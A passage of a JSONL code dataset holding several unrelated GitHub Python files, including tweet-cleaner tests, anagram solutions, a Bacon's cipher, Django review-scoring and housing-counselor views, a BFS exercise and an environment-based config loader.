tweet_cleaner.remove_punctuations == text_cleaner.remove_punctuations\n\n\ndef test_get_RT_user_id(tweet_cleaner):\n # RT format\n # RT @user_source: tweet content\n tweet = \"RT @some_user: Hello world!\"\n assert tweet_cleaner.get_RT_user(tweet) == \"@some_user\"\n\n tweet = \"RT @someuser: Hello world!\"\n assert tweet_cleaner.get_RT_user(tweet) == \"@someuser\"\n\n tweet = \"RT @someuserwithveryloiduserud: Hello world!\"\n assert tweet_cleaner.get_RT_user(tweet) == \"@someuserwithveryloiduserud\"\n\n tweet = \"RT @usr: Hello world! @userASD\"\n assert tweet_cleaner.get_RT_user(tweet) == \"@usr\"\n\n tweet = \"No user\"\n assert tweet_cleaner.get_RT_user(tweet) is None\n\n\ndef test_get_mentioned_users(tweet_cleaner):\n # included RT\n tweet = \"RT @some_user: Hello world! @userA, @userB\\n@userCwithverylongname , @usrd\"\n expected_mentioned_users = [\n \"@some_user\",\n \"@userA\",\n \"@userB\",\n \"@userCwithverylongname\",\n \"@usrd\",\n ]\n assert tweet_cleaner.get_mentioned_users(tweet) == expected_mentioned_users\n\n tweet = \"no user is mentioned\"\n assert tweet_cleaner.get_mentioned_users(tweet) is None\n\n\ndef test_replace_RT_start(tweet_cleaner):\n tweet = \"RT @some_user: Hello world! @userA\"\n expected_cleaned_tweet = \"Hello world! @userA\"\n assert tweet_cleaner._replace_RT_start(tweet) == expected_cleaned_tweet\n\n\ndef test_replace_all_users(tweet_cleaner):\n tweet = \"@userA @userB Hello World!\"\n expected_cleaned_tweet = \" Hello World!\"\n assert tweet_cleaner._replace_all_users(tweet) == expected_cleaned_tweet\n\n\ndef test_clean_method(tweet_cleaner):\n # Only tweet content\n tweet = \"RT @some_user: Hello world! @userA @userB\\n@userCwithverylongname @usrd\"\n expected_cleaned_tweet = \"Hello world!\"\n tweet_cleaner.remove_punctuations = False\n assert tweet_cleaner.remove_punctuations == False\n assert (tweet_cleaner.clean(tweet) == expected_cleaned_tweet)\n\n tweet_cleaner.remove_punctuations = True\n assert tweet_cleaner.remove_punctuations == True\n tweet = \"RT @some_user: Hello world! @userA @userB\\n@userCwithverylongname @usrd\"\n expected_cleaned_tweet = \"Hello world\"\n assert (tweet_cleaner.clean(tweet) == expected_cleaned_tweet)\n\n tweet = \"RT @some_user: https://www.youtube.com/ Hello world! by @userA\"\n expected_cleaned_tweet = \"Hello world by\"\n assert (tweet_cleaner.clean(tweet) == expected_cleaned_tweet)\n\n\ndef test_replace_child_method_with_parent_method_it_should_not_error(tweet_cleaner):\n # suppose that we don't know what class the obj. is\n # tweet cleaner should be able to substitute for text cleaner\n text_cleaner = TextCleaner()\n tweet = \"RT @some_user: https://www.youtube.com/ Hello world! 
by @userA\"\n text_cleaner.clean(tweet)\n tweet_cleaner.clean(tweet)\n","repo_name":"chuan-khuna/my-python-utils","sub_path":"tests/preprocessing/text/test_tweet_cleaner.py","file_name":"test_tweet_cleaner.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16429251207","text":"# https://leetcode.com/problems/valid-anagram/\n\n# time: nlogn\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n return sorted(t) == sorted(s)\n\n# time: O(n) space: O(n)\nclass Solution2:\n def isAnagram(self, s: str, t: str) -> bool:\n # check if length is same, if not return false\n if len(s) != len(t):\n return False\n # hashMaps to store the count of the characters\n countS, countT = {}, {}\n\n # iterate through the s and t and add character as keys and number of appearance as values\n for i in range(len(s)):\n countS[s[i]] = 1 + countS.get(s[i], 0)\n countT[t[i]] = 1 + countT.get(t[i], 0)\n # compare both dict if looks the same\n return countS == countT\n\n\ndef isAnagram(s, t):\n if len(s) != len(t):\n return False\n alphaChecks = [0]*26\n for x in s:\n alphaChecks[ord(x) - 97] += 1\n \n for x in t:\n if alphaChecks[ord(x) - 97] != 0:\n alphaChecks[ord(x) - 97] -= 1\n else:\n return False\n for x in alphaChecks:\n if x > 0:\n return False \n return True","repo_name":"b0nbon1/dope-stuff","sub_path":"extras/quick-prep-75/02-valid-anagram.py","file_name":"02-valid-anagram.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"25643760219","text":"\ndef encipher(plaintext, target_text):\n\n \"\"\"\n Encipher plaintext to target text with binary 0\n as lower case and binary 1 as upper case\n \"\"\"\n\n # remove all non-alphabetic characters\n # from plaintext and convert to upper case\n plaintext = ''.join([c for c in plaintext if c.isalpha()]).upper()\n\n # get a string of 0s and 1s representing the\n # formatting of the enciphered message letters\n binary_string = _string_to_bit_pattern(plaintext)\n\n # format the target text letters as upper or lower case\n # according to the bit pattern\n enciphered = _cased_text_from_bit_pattern(target_text, binary_string)\n\n return enciphered\n\n\ndef decipher(enciphered):\n\n \"\"\"\n Decipher enciphered text assuming lower case letters\n represent binary 0 and upper case letters represent binary 1\n \"\"\"\n\n print(\"\\nDeciphering\\n===========\\n\")\n\n # remove everything except letters\n enciphered = ''.join([c for c in enciphered if c.isalpha()])\n\n length = len(enciphered)\n letter_quintet = \"\"\n bit_pattern = \"\"\n deciphered = []\n\n for i in range(0, length, 5):\n\n # grab next 5 letters\n letter_quintet = enciphered[i: i+5]\n\n # get corresponding string of 5 bits\n bit_pattern = _letter_quintet_to_bit_pattern(letter_quintet)\n\n # get letter corresponding to bit pattern\n letter = chr(int(bit_pattern, 2) + 65)\n\n print(f\"{letter_quintet} {bit_pattern} {letter}\")\n\n deciphered.append(letter)\n\n return \"\".join(deciphered)\n\n\n#------------------------------------------------------------\n# \"PRIVATE\" FUNCTIONS\n#------------------------------------------------------------\n\ndef _string_to_bit_pattern(string):\n\n \"\"\"\n Convert string of letters to string of\n corresponding 5-bit patterns\n \"\"\"\n\n binary_list = []\n bit_pattern = \"\"\n\n for letter in string:\n # get ASCII code, subtract 65 and format as 5 bit string\n 
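# Worked example (follows directly from the rule in the comment above):\n        #   'A' -> format(ord('A') - 65, '05b') == '00000'\n        #   'C' -> format(ord('C') - 65, '05b') == '00010'\n        #   'Z' -> format(ord('Z') - 65, '05b') == '11001'\n        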
bit_pattern = format(ord(letter) - 65, '05b')\n binary_list.append(bit_pattern)\n\n return \"\".join(binary_list)\n\n\ndef _cased_text_from_bit_pattern(target_text, binary_pattern):\n\n \"\"\"\n Set case of target text according to string of 5-bit patterns\n\n 0 => lower case\n 1 => upper case\n\n Non-alpha characters are skipped\n \"\"\"\n\n cased_text = []\n\n index = 0\n\n for bit in binary_pattern:\n\n while not target_text[index].isalpha():\n cased_text.append(target_text[index])\n index += 1\n\n if bit == \"0\":\n cased_text.append(target_text[index].lower())\n else:\n cased_text.append(target_text[index].upper())\n\n index += 1\n\n return \"\".join(cased_text)\n\n\ndef _letter_quintet_to_bit_pattern(letter_quintet):\n\n \"\"\"\n Convert string of 5 letters to corresponding bit pattern\n Lower case => 0\n Upper case => 1\n \"\"\"\n\n bit_pattern = []\n\n for c in letter_quintet:\n\n if(c >= \"a\" and c <= \"z\"):\n bit_pattern.append(\"0\")\n elif(c >= \"A\" and c <= \"Z\"):\n bit_pattern.append(\"1\")\n\n return \"\".join(bit_pattern)\n","repo_name":"CodeDrome/bacons-cipher-python","sub_path":"baconscipher.py","file_name":"baconscipher.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10492496462","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom .models import UserReview, UserReviewNoIndicator, UserReview500char, RestModel\nimport re\nimport random\n\ndef index(request):\n if request.method == 'POST':\n\n\n token = request.POST.get(\"token\")\n star_rating = request.POST.get('star_rating')\n review_heading = request.POST.get('review_heading')\n review_box = request.POST.get('review_box')\n print(review_box)\n\n trimmed_review1 = re.sub(' +',' ',review_box)\n trimmed_review = re.sub(r'\\.+','.',trimmed_review1 )\n # array = review_box.split()\n # trimmed_review = \" \".join(array)\n print(trimmed_review)\n no_space = trimmed_review.replace(\" \", \"\")\n review_depth = len(no_space)\n\n print(token)\n print(type(token))\n\n if review_depth >0: \n \n #abcd bca cd ef\n\n #numWords = trimmed_review.count(\" \") + 1\n numWords = len(trimmed_review.split(' '))\n L = (review_depth/numWords)*100\n\n numSent = trimmed_review.count('.') + trimmed_review.count('!') + trimmed_review.count('?') \n if numSent==0:\n numSent = 1\n S = (numSent/numWords)*100\n \n cli = 0.0588 * L - 0.296 * S - 15.8\n ari = 4.71 *(review_depth/numWords) + 0.5 *(numWords/numSent) - 21.43\n avg = (cli + ari )/2\n \n\n\n print(\"depth \" + str(review_depth))\n print(\"Words \" + str(numWords))\n print(\"sent \" + str(numSent))\n print(\"L \" + str(L))\n print(\"S \" + str(S))\n print(\"cli \" + str(cli))\n print(\"ari \" + str(ari))\n print(\"avg \" + str(avg))\n \n\n prolific_id = request.POST.get('prolific_id')\n if token == \"1\":\n u = UserReview(review_heading=review_heading, review_box=review_box, star_rating=star_rating ,\n review_depth = review_depth, ari=ari, cli =cli, avg=avg, prolific_id=prolific_id)\n u.save()\n\n elif token == \"2\":\n u = UserReviewNoIndicator(review_heading=review_heading, review_box=review_box, star_rating=star_rating ,\n review_depth = review_depth, ari=ari, cli =cli, avg=avg, prolific_id=prolific_id)\n u.save()\n\n else : \n u = UserReview500char(review_heading=review_heading, review_box=review_box, star_rating=star_rating ,\n review_depth = review_depth, ari=ari, cli =cli, avg=avg, prolific_id=prolific_id)\n u.save()\n\n return 
redirect(exit)\n\n        else:\n            return render(request, 'newapp1/index.html')\n\n    else:\n        #num_list = [4, 5 , 6]\n        #random_num = random.choice(num_list)\n        #if random_num == 4: \n        #    return render(request, 'newapp1/index.html')\n        #elif random_num == 5:\n        #    return render(request, 'newapp1/index-2.html')\n        #else:\n        #    return render(request, 'newapp1/index500.html') \n\n        count = RestModel.objects.get(key='visited')\n        print(count.value)\n        newCount = count.value + 1\n        print(newCount)\n        count.value = newCount #initial 0 finally 1\n        print(count.value)\n        count.save()\n\n\n        if newCount%3 == 1: \n            return render(request, 'newapp1/index.html')\n        elif newCount%3 == 2:\n            return render(request, 'newapp1/index-2.html')\n        else:\n            return render(request, 'newapp1/index500.html')\n        \n\n\ndef exit(request):\n    return render (request, 'newapp1/exit.html')\n\n\n\n\ndef returnIndices(request):\n    if request.method == 'POST':\n        trimmed_review = request.POST.get('review_box')\n\n        no_space = trimmed_review.replace(\" \", \"\")\n        review_depth = len(no_space)\n\n        #numWords = len(re.findall(r'\\w+', trimmed_review))\n        numWords = len(trimmed_review.split())\n        L = (review_depth/numWords)*100\n\n        numSent = trimmed_review.count('.') + trimmed_review.count('!') + trimmed_review.count('?') \n\n        if numSent==0:\n            numSent = 1 \n        S = (numSent/numWords)*100\n        \n        cli = 0.0588 * L - 0.296 * S - 15.8\n        ari = 4.71 * (L/100) + 0.5 * (100/S) - 21.43\n        avg = (cli + ari )/2\n        \n        #print(trimmed_review)\n        #print(\"depth \" + str(review_depth))\n        #print(\"Words \" + str(numWords))\n        #print(\"sent \" + str(numSent))\n        #print(\"L \" + str(L))\n        #print(\"S \" + str(S))\n        #print(\"cli \" + str(cli))\n        #print(\"ari \" + str(ari))\n        #print(\"avg \" + str(avg))\n\n        return JsonResponse({'depth': review_depth, 'cli': cli, 'ari': ari, 'avg': avg})","repo_name":"aishikamidder05/review-quality-iimb","sub_path":"newapp1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"11472380066","text":"# coding:utf-8\nimport glob\nimport json\nimport os\nfrom collections import defaultdict\nfrom multiprocessing import Manager, Process\n\nfrom .config import data_path, proc_pool_size, start_time\nfrom .db import get_pcr_team\n\nwith open(\"pcr/conf/ch.json\", \"r\", encoding=\"utf-8\") as f:\n    d = json.load(f)\n    main_tank = d[\"main_tank\"]\n    other_list = d[\"other_list\"]\n    all_ch_num = len(d[\"pos2ch_dic\"])\n\n\ndef get_ch_attend_and_win(pcr_team: list[tuple[str]]) -> dict[str, tuple[dict[str, str]]]:\n    '''\n    Count appearance rate and win rate for 1-4 character combinations\n    :param pcr_team database query results\n    :return ch_attend_and_time x/y-axis dicts for each combination size\n    '''\n    def backtrace(t_list: list[str], output_1: defaultdict[int],\n                  output_2: defaultdict[int], output_3: defaultdict[int],\n                  output_4: defaultdict[int], i=0, res=[]):\n        '''\n        Enumerate all character combinations\n        '''\n        if len(res) >= 1:\n            k = \"|\".join(res)\n            if len(res) == 1:\n                output_1[k] += 1\n            elif len(res) == 2:\n                output_2[k] += 1\n            elif len(res) == 3:\n                output_3[k] += 1\n            else:\n                output_4[k] += 1\n                # combinations larger than 4 are never needed, stop recursing\n                return\n        for j in range(i, len(t_list)):\n            backtrace(t_list, output_1, output_2, output_3,\n                      output_4, j + 1, res + [t_list[j]])\n\n    team = set()\n    # appearance counts\n    ch_1_attend_time, ch_2_attend_time = defaultdict(int), defaultdict(int)\n    ch_3_attend_time, ch_4_attend_time = defaultdict(int), defaultdict(int)\n    # win counts / loss counts\n    ch_1_win_time, ch_1_lose_time = defaultdict(int), defaultdict(int)\n    ch_2_win_time, ch_2_lose_time = defaultdict(int), defaultdict(int)\n    ch_3_win_time, ch_3_lose_time = defaultdict(int), defaultdict(int)\n    ch_4_win_time, ch_4_lose_time = defaultdict(int), defaultdict(int)\n    for attack_team, defense_team, _, _ in pcr_team:\n        # count the attacking team\n        if attack_team not in team:\n            team.add(attack_team)\n            backtrace(attack_team.split(\"|\"), ch_1_attend_time, ch_2_attend_time,\n                      ch_3_attend_time, ch_4_attend_time)\n            backtrace(attack_team.split(\"|\"), ch_1_win_time,\n                      ch_2_win_time, ch_3_win_time, ch_4_win_time)\n        # count the defending team\n        if defense_team not in team:\n            team.add(defense_team)\n            backtrace(defense_team.split(\"|\"), ch_1_attend_time, ch_2_attend_time,\n                      ch_3_attend_time, ch_4_attend_time)\n            backtrace(defense_team.split(\"|\"), ch_1_lose_time,\n                      ch_2_lose_time, ch_3_lose_time, ch_4_lose_time)\n\n    ch_attend_and_time = {\n        \"1\": (ch_1_attend_time, ch_1_win_time, ch_1_lose_time),\n        \"2\": (ch_2_attend_time, ch_2_win_time, ch_2_lose_time),\n        \"3\": (ch_3_attend_time, ch_3_win_time, ch_3_lose_time),\n        \"4\": (ch_4_attend_time, ch_4_win_time, ch_4_lose_time)\n    }\n    return ch_attend_and_time\n\n\ndef get_all_team(pcr_team: list[tuple[str]]):\n    '''\n    Collect all of my pjjc lineup records\n    '''\n    _main_tank, my_chlist = set(main_tank), set(main_tank + other_list)\n    # all attackers, attackers common to every record, total upvotes, total downvotes\n    all_team = defaultdict(lambda: ([set(), None, 0, 0]))\n    for attack_team, defense_team, good_comment, bad_comment in pcr_team:\n        d_sp = defense_team.split(\"|\")\n        for ch in d_sp:\n            if ch not in my_chlist or d_sp[-1] not in _main_tank:\n                break\n        else:\n            a_sp = attack_team.split(\"|\")\n            all_team[defense_team][0].update(a_sp)\n            all_team[defense_team][1] = set(\n                a_sp) if all_team[defense_team][1] is None else all_team[defense_team][1] & set(a_sp)\n            all_team[defense_team][2] += good_comment\n            all_team[defense_team][3] += bad_comment\n    return all_team\n\n\ndef get_mypjjc_team(pcr_team: list[tuple[str]]):\n    '''\n    Enumerate all of my pjjc lineups\n    :param pcr_team database query results\n    :return data all of my lineups\n    '''\n    def backtrace(n: int, t_list: list[str], fd, i=0, res=[]):\n        if len(res) == n:\n            d = {r: all_team[r] for r in res}\n            print(str(d), file=fd)\n            return\n        else:\n            for j in range(i, len(t_list)):\n                if res:\n                    # skip teams that repeat a character already used\n                    for ch in t_list[j].split(\"|\"):\n                        if ch in \"|\".join(res):\n                            break\n                    else:\n                        backtrace(n, t_list, fd, j + 1, res + [t_list[j]])\n                else:\n                    backtrace(n, t_list, fd, j + 1, res + [t_list[j]])\n\n    def chunkify(filename: str, file_end: int, size=100*1024*1024):\n        '''\n        Split a file into chunks aligned to line boundaries\n        :param filename file name\n        :param file_end cursor position of the end of the file\n        :return chunk start cursor, chunk length\n        '''\n        with open(filename, 'rb') as f:\n            chunk_end = f.tell()\n            while True:\n                chunk_start = chunk_end\n                f.seek(size, 1)\n                f.readline()\n                chunk_end = f.tell()\n                yield chunk_start, chunk_end - chunk_start\n                if chunk_end > file_end:\n                    break\n\n    all_team = get_all_team(pcr_team)\n    filename = os.path.join(data_path, \"data.txt\")\n    with open(filename, \"w\") as f:\n        backtrace(3, list(all_team.keys()), f)\n\n    # split the file into chunks\n    file_end = os.path.getsize(filename)\n    with open(filename, \"rb\") as f:\n        for index, (chunk_start, size) in enumerate(chunkify(filename, file_end)):\n            f.seek(chunk_start)\n            lines = f.read(size).splitlines()\n            with open(os.path.join(data_path, \"data\" + str(index) + \".txt\"), \"w\") as f:\n                for line in lines:\n                    print(line.decode(\"utf-8\"), file=f)\n\n\ndef get_bad_comment_rate(obj: list[list[str, int, int]]) -> float:\n    '''\n    Overall downvote rate of a three-team pjjc lineup\n    :param obj list of pjjc teams\n    :return downvote rate\n    '''\n    sum_gc_bc = obj[0][2] + obj[1][2] + \\\n        obj[2][2] + obj[0][1] + obj[1][1] + obj[2][1]\n    return ((obj[0][2] + obj[1][2] + obj[2][2]) / sum_gc_bc)\n\n\n
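# A worked example for get_bad_comment_rate, using made-up counts\n# (each entry is [defense_team, good_comments, bad_comments]):\n#   obj = [[\"t1\", 8, 2], [\"t2\", 6, 4], [\"t3\", 9, 1]]\n#   -> (2 + 4 + 1) / (2 + 4 + 1 + 8 + 6 + 9) == 7 / 30, i.e. about 0.23\n\n\n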
def analyze_team_process(filename_lst, res):\n    '''\n    Worker process that analyzes candidate lineups\n    :param filename_lst list of file names to process\n    :param res shared list that collects the results\n    '''\n    for filename in filename_lst:\n        with open(filename, \"r\") as f:\n            for p_team in f:\n                p_team = eval(p_team)\n                lst, s = [], None\n                for defense_team, attack_team_data in p_team.items():\n                    if not attack_team_data[1]:\n                        break\n                    else:\n                        s = attack_team_data[1] if s is None else s & attack_team_data[1]\n                        if not s:\n                            break\n                        gc, bc = attack_team_data[2], attack_team_data[3]\n                        lst.append([defense_team, gc, bc])\n                else:\n                    if s:\n                        res.append(lst)\n\n\ndef analyze_best_pjjc_team():\n    '''\n    Find the best pjjc lineups\n    '''\n    # build the per-process parameter lists\n    data_path_lst = list(filter(lambda x: x != os.path.join(\n        data_path, \"data.txt\"), glob.glob(data_path + \"/*.txt\")))\n    params_lst = [[] for _ in range(proc_pool_size)]\n    for i in range(len(data_path_lst)):\n        params_lst[i % proc_pool_size].append(data_path_lst[i])\n\n    res, p_list = Manager().list(), []\n    for i in range(proc_pool_size):\n        p = Process(target=analyze_team_process, args=(params_lst[i], res))\n        p_list.append(p)\n    for p in p_list:\n        p.start()\n    for p in p_list:\n        p.join()\n\n    # sort by downvote rate, highest first\n    res.sort(key=get_bad_comment_rate, reverse=True)\n\n    with open(\"pcr/res.txt\", \"w\") as f:\n        for r in res:\n            print(r, file=f)\n            # print(\"%s\\t%s\\t%s\\t\" % (r[0][0].ljust(19), r[1][0].ljust(19), r[2][0]))\n\n\nif __name__ == \"__main__\":\n    # fetch all rows from the database\n    pcr_team = get_pcr_team(start_time=start_time)\n\n    # enumerate all of my pjjc lineups\n    get_mypjjc_team(pcr_team)\n\n    # find the best pjjc lineups\n    analyze_best_pjjc_team()\n","repo_name":"635547251/pcr","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"13243516482","text":"\"\"\" \n1. DFS\n- example problems: 음료수 얼려먹기 (freezing drinks), 유기농 배추 (organic cabbage), 바이러스 (virus), 달리기 (running)\n- recursive function\n- function shape: 1. range check\n- if there is a grid map -> run the dfs function from inside a for loop.\n- if there is no grid map (e.g. networks) -> run the for loop inside the dfs function.\n\n2. BFS\n- from collections import deque\n- almost always uses a while queue: loop\n- for i in range(4): -> the algorithm body has to run below this line\n\n\"\"\" \n\nimport sys \nfrom collections import deque \nimport numpy as np \n\ndef bfs(x1, y1, x2, y2):\n    queue = deque()\n    queue.append((x1, y1))\n\n    graph[x1][y1] = 0\n    # visited[x1][y1] = True\n\n    while queue:\n        x, y = queue.popleft()\n\n        if (x == x2) and (y == y2):\n            return graph[x2][y2]\n        for i in range(4):\n            for j in range(1, k+1):\n                nx = x + dx[i] * j\n                ny = y + dy[i] * j\n                \n                # out of range -> try the next direction\n                if nx < 0 or nx >=n or ny < 0 or ny >= m:\n                    break \n                if graph[nx][ny] == '#':\n                    break \n                if graph[nx][ny] == '.':\n                    print('here')\n                    queue.append((nx, ny))\n                    graph[nx][ny] = graph[x][y] + 1\n                if graph[nx][ny] > graph[x][y]:\n                    continue\n                else:\n                    break\n    return -1\n\n\n\ninput = sys.stdin.readline\n# height, width, max number of cells movable per second\nn, m, k = map(int, input().rstrip().split())\ngraph = [list(input().rstrip()) for _ in range(n)] # no .split() -> builds the list character by character, as entered \nvisited = [[False]*m for _ in range(n)]\nx1, y1, x2, y2 = map(int, input().split()) # entered separated by spaces\n\nprint(np.array(graph))\nprint('x1, y1, x2, y2 : ', x1, y1, x2, y2)\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\nprint(bfs(x1-1, y1-1, x2-1, y2-1))\nprint(np.array(graph))\n","repo_name":"cylanokim/Data_Analysis","sub_path":"python_Adv/달리기_bfs.py","file_name":"달리기_bfs.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"13515384024","text":"import logging\nimport re\n\nfrom django.conf import settings\nfrom django.http import HttpResponseBadRequest\nfrom django.shortcuts import redirect\nfrom django.views.generic import TemplateView, View\n\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\nfrom housing_counselor.forms import HousingCounselorForm\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef requests_retry_session(\n    retries=3,\n    backoff_factor=0.3,\n    status_forcelist=(500, 502, 504),\n    session=None,\n):\n    session = session or requests.Session()\n    retry = Retry(\n        total=retries,\n        read=retries,\n        connect=retries,\n        backoff_factor=backoff_factor,\n        status_forcelist=status_forcelist,\n    )\n    adapter = HTTPAdapter(max_retries=retry)\n    session.mount(\"http://\", adapter)\n    session.mount(\"https://\", adapter)\n    return session\n\n\nclass HousingCounselorS3URLMixin:\n    @staticmethod\n    def s3_url(file_format, zipcode):\n        path = settings.HOUSING_COUNSELOR_S3_PATH_TEMPLATE.format(\n            file_format=file_format, zipcode=zipcode\n        )\n        return path\n\n    @classmethod\n    def s3_json_url(cls, zipcode):\n        return cls.s3_url(file_format=\"json\", zipcode=zipcode)\n\n    @classmethod\n    def s3_pdf_url(cls, zipcode):\n        return cls.s3_url(file_format=\"pdf\", zipcode=zipcode)\n\n\nclass HousingCounselorView(TemplateView, HousingCounselorS3URLMixin):\n    template_name = \"housing_counselor/index.html\"\n\n    invalid_zip_msg = {\n        \"error_message\": \"Sorry, you have entered an invalid ZIP code.\",\n        \"error_help\": \"Please enter a valid five-digit ZIP code below.\",\n    }\n\n    failed_fetch_msg = {\n        \"error_message\": \"Sorry, there was an error retrieving your results.\",\n        \"error_help\": \"Please try again later.\",\n    }\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context[\"mapbox_access_token\"] = settings.MAPBOX_ACCESS_TOKEN\n\n        zipcode = self.request.GET.get(\"zipcode\")\n        context[\"zipcode\"] = zipcode\n\n        if zipcode:\n            zipcode_valid = 
re.match(r\"^\\d{5}$\", zipcode)\n\n if zipcode_valid:\n try:\n api_json = self.get_counselors(self.request, zipcode)\n except requests.HTTPError:\n context.update(self.invalid_zip_msg)\n except requests.exceptions.ConnectionError as err:\n logger.warning(err)\n context.update(self.failed_fetch_msg)\n else:\n context.update(\n {\n \"zipcode_valid\": True,\n \"api_json\": api_json,\n \"pdf_url\": self.s3_pdf_url(zipcode),\n }\n )\n else:\n context.update(self.invalid_zip_msg)\n\n return context\n\n @classmethod\n def get_counselors(cls, request, zipcode):\n \"\"\"Return list of housing counselors closest to a given zipcode.\n\n Raises requests.HTTPError on for nonexistent ZIP code.\n Raises requests.exceptions.ConnectionError for aborted connections.\n \"\"\"\n api_url = cls.s3_json_url(zipcode)\n\n response = requests_retry_session().get(api_url)\n response.raise_for_status()\n\n return response.json()\n\n\nclass HousingCounselorPDFView(View, HousingCounselorS3URLMixin):\n def get(self, request):\n form = HousingCounselorForm(request.GET)\n\n if not form.is_valid():\n return HttpResponseBadRequest(\"invalid zip code\")\n\n zipcode = form.cleaned_data[\"zip\"]\n return redirect(self.s3_pdf_url(zipcode))\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/housing_counselor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"17411824814","text":"class Solution:\n # @param A : list of integers\n # @return an integer\n def solve(self, A):\n A.sort(reverse=False)\n for i in range(len(A)):\n if A[i] == len(A) - i - 1:\n c = 1\n break\n else:\n c = -1\n\n return c\n\n\nif __name__ == \"__main__\":\n A = [1, 2, 4, 8, 5, 6, 7]\n print(Solution().solve(A))\n","repo_name":"avirupdandapat/ALGOPROJECT","sub_path":"nobleinteger.py","file_name":"nobleinteger.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2548482772","text":"import os\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n# load cloud settings for defaults\nif os.environ.get('AMQP_PORT_5672_TCP') or os.environ.get('AMQP_HOST'):\n\tamqp_user = os.environ.get('AMQP_USER', 'guest')\n\tamqp_pass = os.environ.get('AMQP_PASSWORD', 'guest')\n\tamqp_ip = os.environ.get('AMQP_HOST', '127.0.0.1')\n\tamqp_ip = os.environ.get('AMQP_PORT_5672_TCP_ADDR', amqp_ip)\n\tamqp_port = os.environ.get('AMQP_PORT', '5672')\n\tamqp_port = os.environ.get('AMQP_PORT_5672_TCP_PORT', amqp_port)\n\tamqp_vhost = os.environ.get('AMQP_VHOST', '/')\n\tCELERY_BROKER = 'amqp://%s:%s@%s:%s/%s' % (\n\t\tamqp_user, amqp_pass, amqp_ip, amqp_port, amqp_vhost\n\t)\n\tlogger.info(\"Docker AMQP link detected, guessing %s\" % (CELERY_BROKER,))\n\n# detect docker links\nif os.environ.get('MEMCACHED_PORT_11211_TCP'):\n\tMEMCACHE_SERVERS = [\"%s:%s\" % (\n\t os.environ['MEMCACHED_PORT_11211_TCP_ADDR'],\n\t os.environ['MEMCACHED_PORT_11211_TCP_PORT']\n\t)]\n\tlogger.info(\"Docker Memcache link detected, guessing %s\" % (MEMCACHE_SERVERS,))\n\n# detect docker redis\nif os.environ.get('REDIS_PORT_6379_TCP_PORT'):\n\tREDIS_HOST = os.environ.get('REDIS_PORT_6379_TCP_ADDR', '127.0.0.1')\n\tlogger.info(\"Docker Redis link detected, guessing %s\" % (REDIS_HOST,))\n\n# detect openshift\nif os.environ.get('OPENSHIFT_MEMCACHED_HOST') and \\\n os.environ.get('OPENSHIFT_MEMCACHED_PORT'):\n\tMEMCACHE_SERVERS = [\"%s:%s\" % (\n\t 
os.environ['OPENSHIFT_MEMCACHED_HOST'],\n\t os.environ['OPENSHIFT_MEMCACHED_PORT']\n\t)]\n\tMEMCACHE_ARGS = {\n\t 'username': os.environ['OPENSHIFT_MEMCACHED_USERNAME'],\n\t 'password': os.environ['OPENSHIFT_MEMCACHED_PASSWORD']\n\t}\n\tlogger.info(\"Openshift Memcache link detected, guessing %s\" % (MEMCACHE_SERVERS,))\n\n# some fancy processing\nif os.environ.get('DATA_BACKGROUND'):\n\tif os.environ['DATA_BACKGROUND'].lower() in ['yes', 'true']:\n\t\tDATA_BACKGROUND = True\n\t\tlogger.info(\"Loading DATA_BACKGROUND from environ: %s\" % (DATA_BACKGROUND,))\n\tif os.environ['DATA_BACKGROUND'].lower() in ['no', 'false']:\n\t\tDATA_BACKGROUND = False\n\t\tlogger.info(\"Loading DATA_BACKGROUND from environ: %s\" % (DATA_BACKGROUND,))\nif os.environ.get('GAE_BASEURL'):\n\tBASE_URL = os.environ['GAE_BASEURL']\n\tlogger.info(\"Loading BASE_URL from GAE: %s\" % (BASE_URL,))\nif os.environ.get('MEMCACHE_SERVER'):\n\tMEMCACHE_SERVERS = [os.environ['MEMCACHE_SERVER']]\n\tlogger.info(\"Loading MEMCACHE_SERVER from environ: %s\" % (MEMCACHE_SERVERS[0],))\nif os.environ.get('MEMCACHE_SERVERS'):\n\tMEMCACHE_SERVERS = os.environ['MEMCACHE_SERVERS'].split(',')\n\tMEMCACHE_SERVERS = [s.strip() for s in MEMCACHE_SERVERS]\n\tlogger.info(\"Loading MEMCACHE_SERVERS from environ: %s\" % (MEMCACHE_SERVERS,))\n\n# make sure the memcache servers have ports\nif 'MEMCACHE_SERVERS' in globals():\n\tdef add_port(host, port):\n\t\tif ':' not in host:\n\t\t\treturn \"%s:%s\" % (host, port)\n\t\treturn host\n\tMEMCACHE_SERVERS = [add_port(s, '11211') for s in MEMCACHE_SERVERS]\n\n# try to load some keys from environment\nenv_keys = [\n 'BASE_URL',\n 'CELERY_BROKER', 'CELERY_RESULT_BACKEND', 'CELERY_CACHE_BACKEND',\n 'REDIS_HOST',\n 'AMAZON_ACCESS_KEY_ID', 'AMAZON_SECRET_ACCESS_KEY', 